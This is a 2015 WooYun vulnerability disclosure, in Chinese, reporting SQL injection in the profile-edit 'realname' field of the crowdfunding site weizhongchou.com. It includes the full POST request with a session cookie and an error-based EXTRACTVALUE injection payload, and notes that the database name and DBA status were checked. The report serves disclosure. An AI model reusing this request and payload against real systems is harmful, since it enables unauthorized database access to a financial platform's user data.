微众筹网站存在SQL注入 | wooyun-2015-0142716| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142716

漏洞标题：微众筹网站存在SQL注入

漏洞作者：路人甲

提交时间：2015-09-22 11:38

修复时间：2015-11-06 11:40

公开时间：2015-11-06 11:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-22：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-06：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

微众筹（weizhongchou.com）是为个人、企业和机构提供投融资服务的互联网金融平台。
既然是和金融挂钩的，要不要重视一点安全。
顺便求个邀请码，谢谢

详细说明：

既然已经把登录界面等几个注入修复了，为什么不把这个也修复掉呢？
漏洞存在于登录后的个人信息修改页面中的realname参数，realname后面几个参数可能也存在问题，没有做测试。

POST /?user&q=code/rating/basic HTTP/1.1
Host: www.weizhongchou.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.weizhongchou.com/?user&q=code/rating/basic
Cookie: Hm_lvt_d5a437229cbd217c2211f2ed42ee3337=1441935543,1442884232,1442885020; pgv_pvi=7071446016; PHPSESSID=v6nmu2u52ockgbtbqe77897k65; Hm_lpvt_d5a437229cbd217c2211f2ed42ee3337=1442886359; pgv_si=s8797265920; hasshown=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 229
realname=&card_id=&phone_num=13111111111&sex=1&birthday=2015-09-15&edu=1&school_year=2015-09-07&school=ssssssssss&marry=1&children=1&house=1&is_car=1&province=40&city=41&address=ssssssssss&phone=&submit=submit&submit=%CC%E1%BD%BB

注入参数：

Payload: realname=' AND EXTRACTVALUE(1106,CONCAT(0x5c,0x71767a6271,(SELECT (ELT(1106=1106,1))),0x716a6b6271)) AND 'GyWQ'='GyWQ&card_id=&phone_num=13111111111&sex=1&birthday=2015-09-15&edu=1&school_year=2015-09-07&school=ssssssssss&marry=1&children=1&house=1&is_car=1&province=40&city=41&address=ssssssssss&phone=&submit=submit&submit=%CC%E1%BD%BB---

漏洞证明：

看一下当前所使用的数据库--current-db

看一下是不是dba，并不是，还不错

没有继续向下做，但是涉及到金融，可能一点点小问题也能引发血案啊～～

修复方案：

登录框和其他几个地方的注入都修复好了，这个也一样，估计也只是忘记这个点了 *^_^*

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝